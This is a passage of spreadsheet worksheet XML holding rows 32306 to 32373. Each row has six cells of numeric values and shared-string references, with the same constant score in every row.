        <v>8686.0</v>
      </c>
      <c r="B32306" s="2">
        <v>5.4408118E7</v>
      </c>
      <c r="C32306" s="2" t="s">
        <v>31087</v>
      </c>
      <c r="D32306" s="2">
        <v>1.0</v>
      </c>
      <c r="E32306" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32306" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32307" ht="15.75" customHeight="1">
      <c r="A32307" s="1">
        <v>8834.0</v>
      </c>
      <c r="B32307" s="2">
        <v>5.4657366E7</v>
      </c>
      <c r="C32307" s="2" t="s">
        <v>31088</v>
      </c>
      <c r="D32307" s="2">
        <v>1.0</v>
      </c>
      <c r="E32307" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32307" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32308" ht="15.75" customHeight="1">
      <c r="A32308" s="1">
        <v>8992.0</v>
      </c>
      <c r="B32308" s="2">
        <v>5.4962246E7</v>
      </c>
      <c r="C32308" s="2" t="s">
        <v>31089</v>
      </c>
      <c r="D32308" s="2">
        <v>1.0</v>
      </c>
      <c r="E32308" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32308" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32309" ht="15.75" customHeight="1">
      <c r="A32309" s="1">
        <v>9006.0</v>
      </c>
      <c r="B32309" s="2">
        <v>5.4974902E7</v>
      </c>
      <c r="C32309" s="2" t="s">
        <v>31090</v>
      </c>
      <c r="D32309" s="2">
        <v>1.0</v>
      </c>
      <c r="E32309" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32309" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32310" ht="15.75" customHeight="1">
      <c r="A32310" s="1">
        <v>9065.0</v>
      </c>
      <c r="B32310" s="2">
        <v>5.511948E7</v>
      </c>
      <c r="C32310" s="2" t="s">
        <v>31091</v>
      </c>
      <c r="D32310" s="2">
        <v>1.0</v>
      </c>
      <c r="E32310" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32310" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32311" ht="15.75" customHeight="1">
      <c r="A32311" s="1">
        <v>9210.0</v>
      </c>
      <c r="B32311" s="2">
        <v>5.5414612E7</v>
      </c>
      <c r="C32311" s="2" t="s">
        <v>31092</v>
      </c>
      <c r="D32311" s="2">
        <v>1.0</v>
      </c>
      <c r="E32311" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32311" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32312" ht="15.75" customHeight="1">
      <c r="A32312" s="1">
        <v>9241.0</v>
      </c>
      <c r="B32312" s="2">
        <v>5.5466815E7</v>
      </c>
      <c r="C32312" s="2" t="s">
        <v>31093</v>
      </c>
      <c r="D32312" s="2">
        <v>1.0</v>
      </c>
      <c r="E32312" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32312" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32313" ht="15.75" customHeight="1">
      <c r="A32313" s="1">
        <v>9287.0</v>
      </c>
      <c r="B32313" s="2">
        <v>5.5535855E7</v>
      </c>
      <c r="C32313" s="2" t="s">
        <v>31094</v>
      </c>
      <c r="D32313" s="2">
        <v>1.0</v>
      </c>
      <c r="E32313" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32313" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32314" ht="15.75" customHeight="1">
      <c r="A32314" s="1">
        <v>9521.0</v>
      </c>
      <c r="B32314" s="2">
        <v>5.5977813E7</v>
      </c>
      <c r="C32314" s="2" t="s">
        <v>31095</v>
      </c>
      <c r="D32314" s="2">
        <v>1.0</v>
      </c>
      <c r="E32314" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32314" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32315" ht="15.75" customHeight="1">
      <c r="A32315" s="1">
        <v>9660.0</v>
      </c>
      <c r="B32315" s="2">
        <v>5.6297503E7</v>
      </c>
      <c r="C32315" s="2" t="s">
        <v>31096</v>
      </c>
      <c r="D32315" s="2">
        <v>1.0</v>
      </c>
      <c r="E32315" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32315" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32316" ht="15.75" customHeight="1">
      <c r="A32316" s="1">
        <v>9859.0</v>
      </c>
      <c r="B32316" s="2">
        <v>5.6709687E7</v>
      </c>
      <c r="C32316" s="2" t="s">
        <v>31097</v>
      </c>
      <c r="D32316" s="2">
        <v>1.0</v>
      </c>
      <c r="E32316" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32316" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32317" ht="15.75" customHeight="1">
      <c r="A32317" s="1">
        <v>9910.0</v>
      </c>
      <c r="B32317" s="2">
        <v>5.6791996E7</v>
      </c>
      <c r="C32317" s="2" t="s">
        <v>31098</v>
      </c>
      <c r="D32317" s="2">
        <v>1.0</v>
      </c>
      <c r="E32317" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32317" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32318" ht="15.75" customHeight="1">
      <c r="A32318" s="1">
        <v>10024.0</v>
      </c>
      <c r="B32318" s="2">
        <v>5.7052515E7</v>
      </c>
      <c r="C32318" s="2" t="s">
        <v>31099</v>
      </c>
      <c r="D32318" s="2">
        <v>1.0</v>
      </c>
      <c r="E32318" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32318" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32319" ht="15.75" customHeight="1">
      <c r="A32319" s="1">
        <v>10069.0</v>
      </c>
      <c r="B32319" s="2">
        <v>5.7142626E7</v>
      </c>
      <c r="C32319" s="2" t="s">
        <v>31100</v>
      </c>
      <c r="D32319" s="2">
        <v>1.0</v>
      </c>
      <c r="E32319" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32319" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32320" ht="15.75" customHeight="1">
      <c r="A32320" s="1">
        <v>10323.0</v>
      </c>
      <c r="B32320" s="2">
        <v>5.7707213E7</v>
      </c>
      <c r="C32320" s="2" t="s">
        <v>31101</v>
      </c>
      <c r="D32320" s="2">
        <v>1.0</v>
      </c>
      <c r="E32320" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32320" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32321" ht="15.75" customHeight="1">
      <c r="A32321" s="1">
        <v>10593.0</v>
      </c>
      <c r="B32321" s="2">
        <v>1.3430759E7</v>
      </c>
      <c r="C32321" s="2" t="s">
        <v>31102</v>
      </c>
      <c r="D32321" s="2">
        <v>1.0</v>
      </c>
      <c r="E32321" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32321" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32322" ht="15.75" customHeight="1">
      <c r="A32322" s="1">
        <v>10623.0</v>
      </c>
      <c r="B32322" s="2">
        <v>1.3794022E7</v>
      </c>
      <c r="C32322" s="2" t="s">
        <v>31103</v>
      </c>
      <c r="D32322" s="2">
        <v>1.0</v>
      </c>
      <c r="E32322" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32322" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32323" ht="15.75" customHeight="1">
      <c r="A32323" s="1">
        <v>10679.0</v>
      </c>
      <c r="B32323" s="2">
        <v>1.4604829E7</v>
      </c>
      <c r="C32323" s="2" t="s">
        <v>31104</v>
      </c>
      <c r="D32323" s="2">
        <v>1.0</v>
      </c>
      <c r="E32323" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32323" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32324" ht="15.75" customHeight="1">
      <c r="A32324" s="1">
        <v>10689.0</v>
      </c>
      <c r="B32324" s="2">
        <v>1.4710974E7</v>
      </c>
      <c r="C32324" s="2" t="s">
        <v>31105</v>
      </c>
      <c r="D32324" s="2">
        <v>1.0</v>
      </c>
      <c r="E32324" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32324" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32325" ht="15.75" customHeight="1">
      <c r="A32325" s="1">
        <v>10935.0</v>
      </c>
      <c r="B32325" s="2">
        <v>1.6968183E7</v>
      </c>
      <c r="C32325" s="2" t="s">
        <v>31106</v>
      </c>
      <c r="D32325" s="2">
        <v>1.0</v>
      </c>
      <c r="E32325" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32325" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32326" ht="15.75" customHeight="1">
      <c r="A32326" s="1">
        <v>11052.0</v>
      </c>
      <c r="B32326" s="2">
        <v>1.8176914E7</v>
      </c>
      <c r="C32326" s="2" t="s">
        <v>31107</v>
      </c>
      <c r="D32326" s="2">
        <v>1.0</v>
      </c>
      <c r="E32326" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32326" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32327" ht="15.75" customHeight="1">
      <c r="A32327" s="1">
        <v>11094.0</v>
      </c>
      <c r="B32327" s="2">
        <v>1.8519628E7</v>
      </c>
      <c r="C32327" s="2" t="s">
        <v>31108</v>
      </c>
      <c r="D32327" s="2">
        <v>1.0</v>
      </c>
      <c r="E32327" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32327" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32328" ht="15.75" customHeight="1">
      <c r="A32328" s="1">
        <v>11379.0</v>
      </c>
      <c r="B32328" s="2">
        <v>2.1418559E7</v>
      </c>
      <c r="C32328" s="2" t="s">
        <v>31109</v>
      </c>
      <c r="D32328" s="2">
        <v>1.0</v>
      </c>
      <c r="E32328" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32328" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32329" ht="15.75" customHeight="1">
      <c r="A32329" s="1">
        <v>11545.0</v>
      </c>
      <c r="B32329" s="2">
        <v>2.2646909E7</v>
      </c>
      <c r="C32329" s="2" t="s">
        <v>31110</v>
      </c>
      <c r="D32329" s="2">
        <v>1.0</v>
      </c>
      <c r="E32329" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32329" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32330" ht="15.75" customHeight="1">
      <c r="A32330" s="1">
        <v>11635.0</v>
      </c>
      <c r="B32330" s="2">
        <v>2.3175972E7</v>
      </c>
      <c r="C32330" s="2" t="s">
        <v>31111</v>
      </c>
      <c r="D32330" s="2">
        <v>1.0</v>
      </c>
      <c r="E32330" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32330" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32331" ht="15.75" customHeight="1">
      <c r="A32331" s="1">
        <v>11820.0</v>
      </c>
      <c r="B32331" s="2">
        <v>2.4619498E7</v>
      </c>
      <c r="C32331" s="2" t="s">
        <v>31112</v>
      </c>
      <c r="D32331" s="2">
        <v>1.0</v>
      </c>
      <c r="E32331" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32331" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32332" ht="15.75" customHeight="1">
      <c r="A32332" s="1">
        <v>12015.0</v>
      </c>
      <c r="B32332" s="2">
        <v>2.6044785E7</v>
      </c>
      <c r="C32332" s="2" t="s">
        <v>31113</v>
      </c>
      <c r="D32332" s="2">
        <v>1.0</v>
      </c>
      <c r="E32332" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32332" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32333" ht="15.75" customHeight="1">
      <c r="A32333" s="1">
        <v>12149.0</v>
      </c>
      <c r="B32333" s="2">
        <v>2.7238844E7</v>
      </c>
      <c r="C32333" s="2" t="s">
        <v>31114</v>
      </c>
      <c r="D32333" s="2">
        <v>1.0</v>
      </c>
      <c r="E32333" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32333" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32334" ht="15.75" customHeight="1">
      <c r="A32334" s="1">
        <v>12185.0</v>
      </c>
      <c r="B32334" s="2">
        <v>2.7481027E7</v>
      </c>
      <c r="C32334" s="2" t="s">
        <v>31115</v>
      </c>
      <c r="D32334" s="2">
        <v>1.0</v>
      </c>
      <c r="E32334" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32334" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32335" ht="15.75" customHeight="1">
      <c r="A32335" s="1">
        <v>12191.0</v>
      </c>
      <c r="B32335" s="2">
        <v>2.7481027E7</v>
      </c>
      <c r="C32335" s="2" t="s">
        <v>31116</v>
      </c>
      <c r="D32335" s="2">
        <v>1.0</v>
      </c>
      <c r="E32335" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32335" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32336" ht="15.75" customHeight="1">
      <c r="A32336" s="1">
        <v>12237.0</v>
      </c>
      <c r="B32336" s="2">
        <v>2.7878413E7</v>
      </c>
      <c r="C32336" s="2" t="s">
        <v>31117</v>
      </c>
      <c r="D32336" s="2">
        <v>1.0</v>
      </c>
      <c r="E32336" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32336" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32337" ht="15.75" customHeight="1">
      <c r="A32337" s="1">
        <v>12253.0</v>
      </c>
      <c r="B32337" s="2">
        <v>2.7951325E7</v>
      </c>
      <c r="C32337" s="2" t="s">
        <v>31118</v>
      </c>
      <c r="D32337" s="2">
        <v>1.0</v>
      </c>
      <c r="E32337" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32337" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32338" ht="15.75" customHeight="1">
      <c r="A32338" s="1">
        <v>12451.0</v>
      </c>
      <c r="B32338" s="2">
        <v>2.9304961E7</v>
      </c>
      <c r="C32338" s="2" t="s">
        <v>31119</v>
      </c>
      <c r="D32338" s="2">
        <v>1.0</v>
      </c>
      <c r="E32338" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32338" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32339" ht="15.75" customHeight="1">
      <c r="A32339" s="1">
        <v>12534.0</v>
      </c>
      <c r="B32339" s="2">
        <v>2.9798344E7</v>
      </c>
      <c r="C32339" s="2" t="s">
        <v>31120</v>
      </c>
      <c r="D32339" s="2">
        <v>1.0</v>
      </c>
      <c r="E32339" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32339" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32340" ht="15.75" customHeight="1">
      <c r="A32340" s="1">
        <v>12543.0</v>
      </c>
      <c r="B32340" s="2">
        <v>2.9811683E7</v>
      </c>
      <c r="C32340" s="2" t="s">
        <v>31121</v>
      </c>
      <c r="D32340" s="2">
        <v>1.0</v>
      </c>
      <c r="E32340" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32340" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32341" ht="15.75" customHeight="1">
      <c r="A32341" s="1">
        <v>12795.0</v>
      </c>
      <c r="B32341" s="2">
        <v>3.1394842E7</v>
      </c>
      <c r="C32341" s="2" t="s">
        <v>31122</v>
      </c>
      <c r="D32341" s="2">
        <v>1.0</v>
      </c>
      <c r="E32341" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32341" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32342" ht="15.75" customHeight="1">
      <c r="A32342" s="1">
        <v>12832.0</v>
      </c>
      <c r="B32342" s="2">
        <v>3.1653491E7</v>
      </c>
      <c r="C32342" s="2" t="s">
        <v>31123</v>
      </c>
      <c r="D32342" s="2">
        <v>1.0</v>
      </c>
      <c r="E32342" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32342" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32343" ht="15.75" customHeight="1">
      <c r="A32343" s="1">
        <v>12951.0</v>
      </c>
      <c r="B32343" s="2">
        <v>3.2384188E7</v>
      </c>
      <c r="C32343" s="2" t="s">
        <v>31124</v>
      </c>
      <c r="D32343" s="2">
        <v>1.0</v>
      </c>
      <c r="E32343" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32343" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32344" ht="15.75" customHeight="1">
      <c r="A32344" s="1">
        <v>12978.0</v>
      </c>
      <c r="B32344" s="2">
        <v>3.2641963E7</v>
      </c>
      <c r="C32344" s="2" t="s">
        <v>31125</v>
      </c>
      <c r="D32344" s="2">
        <v>1.0</v>
      </c>
      <c r="E32344" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32344" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32345" ht="15.75" customHeight="1">
      <c r="A32345" s="1">
        <v>12981.0</v>
      </c>
      <c r="B32345" s="2">
        <v>3.2684909E7</v>
      </c>
      <c r="C32345" s="2" t="s">
        <v>31126</v>
      </c>
      <c r="D32345" s="2">
        <v>1.0</v>
      </c>
      <c r="E32345" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32345" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32346" ht="15.75" customHeight="1">
      <c r="A32346" s="1">
        <v>13378.0</v>
      </c>
      <c r="B32346" s="2">
        <v>3.4877947E7</v>
      </c>
      <c r="C32346" s="2" t="s">
        <v>31127</v>
      </c>
      <c r="D32346" s="2">
        <v>1.0</v>
      </c>
      <c r="E32346" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32346" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32347" ht="15.75" customHeight="1">
      <c r="A32347" s="1">
        <v>13504.0</v>
      </c>
      <c r="B32347" s="2">
        <v>3.5440179E7</v>
      </c>
      <c r="C32347" s="2" t="s">
        <v>31128</v>
      </c>
      <c r="D32347" s="2">
        <v>1.0</v>
      </c>
      <c r="E32347" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32347" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32348" ht="15.75" customHeight="1">
      <c r="A32348" s="1">
        <v>13666.0</v>
      </c>
      <c r="B32348" s="2">
        <v>3.6011765E7</v>
      </c>
      <c r="C32348" s="2" t="s">
        <v>31129</v>
      </c>
      <c r="D32348" s="2">
        <v>1.0</v>
      </c>
      <c r="E32348" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32348" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32349" ht="15.75" customHeight="1">
      <c r="A32349" s="1">
        <v>13687.0</v>
      </c>
      <c r="B32349" s="2">
        <v>3.6094038E7</v>
      </c>
      <c r="C32349" s="2" t="s">
        <v>31130</v>
      </c>
      <c r="D32349" s="2">
        <v>1.0</v>
      </c>
      <c r="E32349" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32349" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32350" ht="15.75" customHeight="1">
      <c r="A32350" s="1">
        <v>13844.0</v>
      </c>
      <c r="B32350" s="2">
        <v>3.683817E7</v>
      </c>
      <c r="C32350" s="2" t="s">
        <v>31131</v>
      </c>
      <c r="D32350" s="2">
        <v>1.0</v>
      </c>
      <c r="E32350" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32350" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32351" ht="15.75" customHeight="1">
      <c r="A32351" s="1">
        <v>13943.0</v>
      </c>
      <c r="B32351" s="2">
        <v>3.7186858E7</v>
      </c>
      <c r="C32351" s="2" t="s">
        <v>31132</v>
      </c>
      <c r="D32351" s="2">
        <v>1.0</v>
      </c>
      <c r="E32351" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32351" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32352" ht="15.75" customHeight="1">
      <c r="A32352" s="1">
        <v>13960.0</v>
      </c>
      <c r="B32352" s="2">
        <v>3.7298978E7</v>
      </c>
      <c r="C32352" s="2" t="s">
        <v>31133</v>
      </c>
      <c r="D32352" s="2">
        <v>1.0</v>
      </c>
      <c r="E32352" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32352" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32353" ht="15.75" customHeight="1">
      <c r="A32353" s="1">
        <v>14077.0</v>
      </c>
      <c r="B32353" s="2">
        <v>3.76641E7</v>
      </c>
      <c r="C32353" s="2" t="s">
        <v>31134</v>
      </c>
      <c r="D32353" s="2">
        <v>1.0</v>
      </c>
      <c r="E32353" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32353" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32354" ht="15.75" customHeight="1">
      <c r="A32354" s="1">
        <v>14155.0</v>
      </c>
      <c r="B32354" s="2">
        <v>3.8000963E7</v>
      </c>
      <c r="C32354" s="2" t="s">
        <v>31135</v>
      </c>
      <c r="D32354" s="2">
        <v>1.0</v>
      </c>
      <c r="E32354" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32354" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32355" ht="15.75" customHeight="1">
      <c r="A32355" s="1">
        <v>14576.0</v>
      </c>
      <c r="B32355" s="2">
        <v>4.0086069E7</v>
      </c>
      <c r="C32355" s="2" t="s">
        <v>31136</v>
      </c>
      <c r="D32355" s="2">
        <v>1.0</v>
      </c>
      <c r="E32355" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32355" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32356" ht="15.75" customHeight="1">
      <c r="A32356" s="1">
        <v>14578.0</v>
      </c>
      <c r="B32356" s="2">
        <v>4.0098431E7</v>
      </c>
      <c r="C32356" s="2" t="s">
        <v>31137</v>
      </c>
      <c r="D32356" s="2">
        <v>1.0</v>
      </c>
      <c r="E32356" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32356" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32357" ht="15.75" customHeight="1">
      <c r="A32357" s="1">
        <v>14762.0</v>
      </c>
      <c r="B32357" s="2">
        <v>4.0830907E7</v>
      </c>
      <c r="C32357" s="2" t="s">
        <v>31138</v>
      </c>
      <c r="D32357" s="2">
        <v>1.0</v>
      </c>
      <c r="E32357" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32357" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32358" ht="15.75" customHeight="1">
      <c r="A32358" s="1">
        <v>14831.0</v>
      </c>
      <c r="B32358" s="2">
        <v>4.1013393E7</v>
      </c>
      <c r="C32358" s="2" t="s">
        <v>31139</v>
      </c>
      <c r="D32358" s="2">
        <v>1.0</v>
      </c>
      <c r="E32358" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32358" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32359" ht="15.75" customHeight="1">
      <c r="A32359" s="1">
        <v>14905.0</v>
      </c>
      <c r="B32359" s="2">
        <v>4.1162164E7</v>
      </c>
      <c r="C32359" s="2" t="s">
        <v>31140</v>
      </c>
      <c r="D32359" s="2">
        <v>1.0</v>
      </c>
      <c r="E32359" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32359" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32360" ht="15.75" customHeight="1">
      <c r="A32360" s="1">
        <v>15219.0</v>
      </c>
      <c r="B32360" s="2">
        <v>4.2163472E7</v>
      </c>
      <c r="C32360" s="2" t="s">
        <v>31141</v>
      </c>
      <c r="D32360" s="2">
        <v>1.0</v>
      </c>
      <c r="E32360" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32360" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32361" ht="15.75" customHeight="1">
      <c r="A32361" s="1">
        <v>15227.0</v>
      </c>
      <c r="B32361" s="2">
        <v>4.2187331E7</v>
      </c>
      <c r="C32361" s="2" t="s">
        <v>31142</v>
      </c>
      <c r="D32361" s="2">
        <v>1.0</v>
      </c>
      <c r="E32361" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32361" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32362" ht="15.75" customHeight="1">
      <c r="A32362" s="1">
        <v>15257.0</v>
      </c>
      <c r="B32362" s="2">
        <v>4.2300517E7</v>
      </c>
      <c r="C32362" s="2" t="s">
        <v>31143</v>
      </c>
      <c r="D32362" s="2">
        <v>1.0</v>
      </c>
      <c r="E32362" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32362" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32363" ht="15.75" customHeight="1">
      <c r="A32363" s="1">
        <v>15303.0</v>
      </c>
      <c r="B32363" s="2">
        <v>4.2474815E7</v>
      </c>
      <c r="C32363" s="2" t="s">
        <v>31144</v>
      </c>
      <c r="D32363" s="2">
        <v>1.0</v>
      </c>
      <c r="E32363" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32363" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32364" ht="15.75" customHeight="1">
      <c r="A32364" s="1">
        <v>15379.0</v>
      </c>
      <c r="B32364" s="2">
        <v>4.2768856E7</v>
      </c>
      <c r="C32364" s="2" t="s">
        <v>31145</v>
      </c>
      <c r="D32364" s="2">
        <v>1.0</v>
      </c>
      <c r="E32364" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32364" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32365" ht="15.75" customHeight="1">
      <c r="A32365" s="1">
        <v>15525.0</v>
      </c>
      <c r="B32365" s="2">
        <v>4.3293068E7</v>
      </c>
      <c r="C32365" s="2" t="s">
        <v>31146</v>
      </c>
      <c r="D32365" s="2">
        <v>1.0</v>
      </c>
      <c r="E32365" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32365" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32366" ht="15.75" customHeight="1">
      <c r="A32366" s="1">
        <v>15554.0</v>
      </c>
      <c r="B32366" s="2">
        <v>4.3406596E7</v>
      </c>
      <c r="C32366" s="2" t="s">
        <v>31147</v>
      </c>
      <c r="D32366" s="2">
        <v>1.0</v>
      </c>
      <c r="E32366" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32366" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32367" ht="15.75" customHeight="1">
      <c r="A32367" s="1">
        <v>15560.0</v>
      </c>
      <c r="B32367" s="2">
        <v>4.3426859E7</v>
      </c>
      <c r="C32367" s="2" t="s">
        <v>31148</v>
      </c>
      <c r="D32367" s="2">
        <v>1.0</v>
      </c>
      <c r="E32367" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32367" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32368" ht="15.75" customHeight="1">
      <c r="A32368" s="1">
        <v>15703.0</v>
      </c>
      <c r="B32368" s="2">
        <v>4.3939776E7</v>
      </c>
      <c r="C32368" s="2" t="s">
        <v>31149</v>
      </c>
      <c r="D32368" s="2">
        <v>1.0</v>
      </c>
      <c r="E32368" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32368" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32369" ht="15.75" customHeight="1">
      <c r="A32369" s="1">
        <v>15866.0</v>
      </c>
      <c r="B32369" s="2">
        <v>4.4500741E7</v>
      </c>
      <c r="C32369" s="2" t="s">
        <v>31150</v>
      </c>
      <c r="D32369" s="2">
        <v>1.0</v>
      </c>
      <c r="E32369" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32369" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32370" ht="15.75" customHeight="1">
      <c r="A32370" s="1">
        <v>15920.0</v>
      </c>
      <c r="B32370" s="2">
        <v>4.4676485E7</v>
      </c>
      <c r="C32370" s="2" t="s">
        <v>31151</v>
      </c>
      <c r="D32370" s="2">
        <v>1.0</v>
      </c>
      <c r="E32370" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32370" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32371" ht="15.75" customHeight="1">
      <c r="A32371" s="1">
        <v>16026.0</v>
      </c>
      <c r="B32371" s="2">
        <v>4.510024E7</v>
      </c>
      <c r="C32371" s="2" t="s">
        <v>31152</v>
      </c>
      <c r="D32371" s="2">
        <v>1.0</v>
      </c>
      <c r="E32371" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32371" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32372" ht="15.75" customHeight="1">
      <c r="A32372" s="1">
        <v>16434.0</v>
      </c>
      <c r="B32372" s="2">
        <v>4.6343017E7</v>
      </c>
      <c r="C32372" s="2" t="s">
        <v>31153</v>
      </c>
      <c r="D32372" s="2">
        <v>1.0</v>
      </c>
      <c r="E32372" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32372" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="32373" ht="15.75" customHeight="1">
